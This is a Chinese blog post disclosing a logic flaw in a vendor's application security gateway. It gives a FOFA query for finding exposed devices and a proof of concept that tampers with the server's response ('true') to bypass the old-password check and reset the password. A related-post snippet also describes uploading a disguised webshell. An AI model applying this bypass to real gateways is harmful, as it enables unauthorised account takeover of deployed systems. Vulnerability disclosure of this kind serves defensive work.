华途应用安全网关存在逻辑缺陷漏洞

马船长

已于 2024-08-16 10:11:21 修改

阅读量142

点赞数 1

文章标签：安全

于 2024-08-16 00:18:37 首次发布

本文链接：https://blog.csdn.net/2301_77012231/article/details/141234516

版权

漏洞描述

浙江华途信息安全技术股份有限公司（简称：华途信息）成立于2007年，是中国领先的数据安全产品与服务提供商，立志成为全球领先的数据安全企业。华途信息总部位于中国杭州，在北京、上海、广州、深圳、成都、武汉、苏州、济南、沈阳等十多个区域设有分支机构。华途应用安全网关存在逻辑缺陷漏洞

FOFA语法:body="应用安全网关 - Powered By asg"

漏洞复现

这里的旧密码验证的时候有逻辑缺陷，只需将返回包改成true即可绕过验证

POC:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Content-Type: application/json;charset=UTF-8
Date: Fri, 16 Aug 2024 02:20:05 GMT
Content-Length: 5

true

绕过旧密码验证之后即可直接设置密码

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

马船长

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

实战公益SRC | 弱口令登录+任意文件上传

hackzkaq的博客

10-23

328

将png后缀修改为jsp后缀，然后发送到重放模块，再接着把改好的包放掉。所有渗透都需获取授权，违者后果自行承担，与本号及作者无关，请谨记守法.申明：本公众号所分享内容仅用于网络安全技术讨论，切勿用于违法途径，如果这里写入的是一句话木马就会被解析执行了，危害等级较高。1.先对密码的设置有强度限制，防止弱口令的出现。2.对上传的文件进行检测过滤。

快解析结合华途文档加密软件

asdaddsd的博客

07-25

1068

历经十多年的攻克研究与创新，华途信息以人工智能、先进密码算法、大数据技术为核心，率先发布“Vamtoo-DSGF数据安全治理体系框架”，围绕个人信息隐私保护、云办公趋势下的数据安全、新型DLP及数据安全治理等业务，从终端、网络、数据库、云实现了数据发现（分类分级）、数据防泄漏、数据安全审计和数据安全态势感知，并支持国产操作系统，已为政府、金融、运营商、能源、军工等多领域客户提供数据安全解决方案，助力国家“一带一路”数据跨境安全防护。目前，快解析已经服务500多万用户，100多万家企业和200家上市公司。..

参与评论您还未登录，请先登录后发表或查看评论

对话华途“少帅” 深耕数据安全市场

weixin_34080571的博客

09-04

142

本文讲的是对话华途“少帅” 深耕数据安全市场，之所以用“少帅”来称谓华途软件董事长兼总裁谢永胜，不仅仅是因为年龄和外貌的那份儒雅，更因为他对数据安全市场的洞察，以及对华途未来发展路径的清晰判断。　　全国网络安全周来到华途软件(以下简称华途)展台，谢永胜正奔波于与北京的合作伙伴和客户碰面的紧张行程中，本以为将是一次时间略短的寒暄，不想却畅谈了近两个小时...

科技百咖 | 华途少帅谢永胜眼中的数据安全治理

中国软件网

08-08

370

中国软件网报道 |公众号：Hapiweb-soft6专注于数据安全并不容易。这种压力或许并不来源于技术上的突破或者产品的更迭，而是来源于生存的压力。相对于传统网络层防...

各大网络安全厂商及安全产品

热门推荐

任浩的博客

01-11

1万+

国内哪些公司在做企业版安全产品开发？问题太大了，做企业版安全产品的N多，有硬件设备、有软件、也有做SAAS在线服务的。国外的一些安全软件是否在中国只做代理销售，基本不会在国内开发？国外的安全软件除非个别的，基本在国内都有代理销售。有没有国外的安全软件开发公司在中国有分公司或办事处？规模比较大的国外安全公司很多在国内有办事处。这个是一个兄弟整理的安全产品厂商分类，找不到出处了。防火墙类（UTM&FW&NGFW）厂商 WAF（web 应用防火墙）厂商数据库审计类厂家运维审计厂商

加密安全及时间同步、自动化部署

GRAGON_W的博客

11-02

2821

一、创建私有CA并进行证书申请。 1.1 创建CA相关目录及文件 [root@Centos8 ~]# mkdir /etc/pki/CA/{certs,crl,newcerts,private} [root@Centos8 ~]# tree /etc/pki/CA/ /etc/pki/CA/ ├── certs ├── crl ├── newcerts └── private index.txt和serial文件在颁发证书时需要使用，如果不存在，会创建失败，需自行创建定义 [root@Centos8 ~]

TT安全小学生成长记

TT成长博客

01-18

1万+

开一个博客，不是收藏文章，而是自己写，假设这里有个学生叫TT，我是一个行业的老鸟，我来带带它，用我杂乱无序，又满腹经纶的感觉灌输给此娃，看看一年后会怎样，三年后会怎样，未来会怎样。

网络安全厂商

zhuisuitong6951的博客

05-12

4484

企业信息安全的重点防护应该放在哪个方面？

singliu48的博客

01-03

596

** 企业信息安全的重点防护应该放在哪个方面？ ** 从2013年开始从事互联网信息领域，自己也只是一个小小的基层销售经理。不敢像业内大神们一样列举各种各样的数据，因为这些数据不是我自己做的统计，我不敢说这些统计的数据的准确性有多高。所以不能去胡乱的引用一些网上有的数据。但从我自己这些年亲身经历的一些客户身上和自己的经历去讲讲这一方面。 2013年的时候当时开始进入互联网行业，做的也很是基础，比如...

华途电子文档安全管理系统5.2.6006-解决方案.pptx

12-13

该系统包括物理安全、网络安全、主机和系统应用安全、数据安全等多个方面的保护措施。技术路线：华途电子文档安全管理系统的技术路线包括_border protection_、数据防护技术路线等。该系统基于华途信息安全技术...

华途数据安全治理白皮书2020.pdf

03-11

详细介绍数据治理概念、数据安全治理概念、全球数据安全标准化情况、数据安全治理组织框架、数据安全治理建设流程、数据安全治理建议等内容。

华途文档安全管理系统（H7）技术白皮书

03-29

- 华途文档安全管理系统H7已在多个行业中得到成功应用。 - 涵盖金融、制造、科研等多个领域的企业。综上所述，华途文档安全管理系统H7作为一款全面的数据安全管理解决方案，不仅能够有效应对当前信息安全领域的...

关于华途数据安全治理白皮书2020的分析说明.zip

11-05

《华途数据安全治理白皮书2020》是一份深入探讨现代企业数据安全问题的重要文献，旨在为业界提供全面的数据安全治理策略和实践指南。这份报告详细阐述了当前企业在数字化转型过程中面临的各种数据安全挑战，以及如何...

华途信息金融行业数据安全解决方案.docx

06-21

华途信息的金融行业数据安全解决方案专注于解决当前金融领域数据安全面临的挑战，这些挑战源于金融机构在数字化转型过程中数据量的增长和数据重要性的提升。国家法律法规、行业监管要求以及国家技术规范共同构成了...

探索光耦：隔离电压——光耦保障电路安全与性能的关键

华途 应用安全网关存在逻辑缺陷漏洞

华途应用安全网关存在逻辑缺陷漏洞